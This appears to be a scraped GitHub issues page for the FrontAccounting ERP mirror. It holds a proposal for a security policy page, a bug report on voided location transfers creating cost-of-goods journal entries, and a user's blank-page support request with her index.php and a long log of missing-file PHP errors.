frontaccountingerp / fa Goto Github PK
View Code? Open in Web Editor NEWOfficial FrontAccounting mirror repository
Official FrontAccounting mirror repository
I noticed that the FrontAccounting ERP website has no software security policy ... especially as it concerns the security and use of key financial information as entered within the software application by prospective clients.
As a copywriter and a marketing expert, I know that having a clear cut policy will surely boost the reputation and marketing/expansion plans of frontaccounting.com as a trusted ERP accounting service provider.
This is especially as it is an open source application and let's face it, not many people out there would be keen on to put their key company or business data at risk by revealing any details about their private or business information on an open source, accounting software website with a sizable number of external developers, coders and contributors with no clearly stated software security policy.
So, I have taken the liberty to use my copywriting skills and crafted a well written, strongly-worded and assertive Software Policy for use on the FrontAccounting.com Software Security Policy page when completed .
Please feel free to read it here.
I hope the software policy page will be set up soon.... as I believe this one written by me will make great marketing and sales copy for the website as well.
Note : all constructive critiques or observations are welcome
After finding why there are many JV transaction adjusting the cost of goods sold without related transactions. I found that those transactions are created when a transaction of location transfer was being voided. The values are about 1 half, 1 third, or 1 fourth of the full value of the items.
It seems FA is trying to recovered the valuation lost during the amount adjustment in each location, while in this case, no change in the value of goods is needed to recalculated and compensated. It is just changing locations.
Hi.
I've been trying to figure out why I get a blank page after logging into my frontaccounting website. I've researched every error resolution possible. And besides no one specifying which folder the php.ini file is in (I've now looked at every single folder in the frontaccounting folder on my sql server -- /big/dom/xkaluwellaco/www/accounting/)
I'm seriously at a loss.
Thanks for any links or suggestions. If I haven't researched this properly, please feel free to let me know.
Thanks again.
Brigitte
This is the index.php file in the /www/accounting folder
http://www.kaluwellaco.net/accounting/index.php
. ***********************************************************************/ $path_to_root="."; if (!file_exists($path_to_root.'/config_db.php')) header("Location: ".$path_to_root."/install/index.php"); $page_security = 'SA_OPEN'; ini_set('xdebug.auto_trace',1); include_once("includes/session.inc"); # add_access_extensions(); $app = &$_SESSION["App"]; if (isset($_GET['application'])) $app->selected_application = $_GET['application']; $app->display(); ?>Each time I correct an error, I receive a new bug. So far these are the bug notices I've received Also, I've uninstalled and reinstalled frontaccounting on my server twice.
This may be why there's a repeat of errors before 17:00.
[01-Nov-2016 15:28:33 EST5EDT] [client 71.218.68.164 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[01-Nov-2016 15:28:33 EST5EDT] [client 71.218.68.164 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[01-Nov-2016 15:28:33 EST5EDT] [client 71.218.68.164 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[01-Nov-2016 15:28:33 EST5EDT] [client 71.218.68.164 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[01-Nov-2016 15:28:33 EST5EDT] [client 71.218.68.164 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[01-Nov-2016 15:28:33 EST5EDT] [client 71.218.68.164 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[01-Nov-2016 15:28:33 EST5EDT] [client 71.218.68.164 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[01-Nov-2016 15:28:33 EST5EDT] [client 71.218.68.164 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[01-Nov-2016 15:28:33 EST5EDT] [client 71.218.68.164 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 18:58:00 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 18:58:00 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 18:58:00 EST5EDT] [client 69.5.8.117 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 18:58:00 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 18:58:00 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 18:58:00 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 18:58:00 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 18:58:00 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 18:58:00 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:00:21 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:00:21 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:00:21 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:00:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:00:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:00:21 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:00:21 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:00:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:00:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:00:33 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:00:33 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:00:33 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:00:33 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:00:33 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:00:33 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:00:33 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:00:33 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:00:56 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:00:56 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:00:56 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:00:56 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:00:56 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:00:56 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:00:56 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:00:56 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:02:01 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:02:01 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:02:01 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:02:01 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:02:01 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:02:01 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:02:01 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:02:01 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:11:25 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:11:25 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:11:25 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:11:25 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:11:25 EST5EDT] [client 67.6.186.36 ] PHP Fatal error: Call to undefined function mysql_connect() in /big/dom/xkaluwellaco/www/accounting/includes/db/connect_db.inc on line 27
[02-Nov-2016 19:15:17 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:15:17 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:15:17 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:15:17 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:15:17 EST5EDT] [client 67.6.186.36 ] PHP Fatal error: Call to undefined function mysql_connect() in /big/dom/xkaluwellaco/www/accounting/includes/db/connect_db.inc on line 27
[02-Nov-2016 19:29:15 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:29:15 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:29:15 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:29:15 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:41:58 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:41:58 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:41:58 EST5EDT] [client 69.5.8.117 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:41:58 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:41:58 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:41:58 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:41:58 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:41:58 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:41:58 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:41:59 EST5EDT] [client 50.63.85.70 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:41:59 EST5EDT] [client 50.63.85.70 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:41:59 EST5EDT] [client 50.63.85.70 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:41:59 EST5EDT] [client 50.63.85.70 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:41:59 EST5EDT] [client 50.63.85.70 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:41:59 EST5EDT] [client 50.63.85.70 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:41:59 EST5EDT] [client 50.63.85.70 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:41:59 EST5EDT] [client 50.63.85.70 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:41:59 EST5EDT] [client 50.63.85.70 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:42:18 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:42:18 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:42:18 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:42:18 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:42:18 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:42:18 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:42:18 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:42:18 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:46:04 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:46:04 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:46:04 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:46:04 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:46:04 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:46:04 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:46:04 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:46:04 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:46:21 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:46:21 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:46:21 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:46:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:46:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:46:21 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:46:21 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:46:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:46:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:46:52 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:46:52 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:46:52 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:46:52 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:46:52 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:46:52 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:46:52 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:46:52 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 19:59:15 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 19:59:15 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 19:59:15 EST5EDT] [client 69.5.8.117 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 19:59:15 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 19:59:15 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 19:59:15 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:59:15 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 19:59:15 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 19:59:15 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 20:11:20 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 20:11:20 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 20:11:20 EST5EDT] [client 69.5.8.117 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 20:11:20 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 20:11:20 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 20:11:20 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 20:11:20 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 20:11:20 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 20:11:20 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 20:11:36 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 20:11:36 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 20:11:36 EST5EDT] [client 69.5.8.117 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 20:11:36 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 20:11:36 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 20:11:36 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 20:11:36 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 20:11:36 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 20:11:36 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 20:12:18 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 20:12:18 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 20:12:18 EST5EDT] [client 69.5.8.117 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 20:12:18 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 20:12:18 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 20:12:18 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 20:12:18 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 20:12:18 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 20:12:18 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 21:50:02 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 21:50:02 EST5EDT] [client 69.5.8.117 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 21:50:02 EST5EDT] [client 69.5.8.117 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 21:50:02 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 21:50:02 EST5EDT] [client 69.5.8.117 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 21:50:02 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 21:50:02 EST5EDT] [client 69.5.8.117 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 21:50:02 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 21:50:02 EST5EDT] [client 69.5.8.117 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 21:50:03 EST5EDT] [client 50.63.85.70 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 21:50:03 EST5EDT] [client 50.63.85.70 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 21:50:03 EST5EDT] [client 50.63.85.70 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 21:50:03 EST5EDT] [client 50.63.85.70 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 21:50:03 EST5EDT] [client 50.63.85.70 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 21:50:03 EST5EDT] [client 50.63.85.70 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 21:50:03 EST5EDT] [client 50.63.85.70 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 21:50:03 EST5EDT] [client 50.63.85.70 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 21:50:03 EST5EDT] [client 50.63.85.70 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 21:53:07 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 21:53:07 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 21:53:07 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 21:53:07 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 21:53:07 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 21:53:07 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 21:53:07 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 21:53:07 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 21:53:21 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 21:53:21 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 21:53:21 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 21:53:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 21:53:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 21:53:21 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 21:53:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
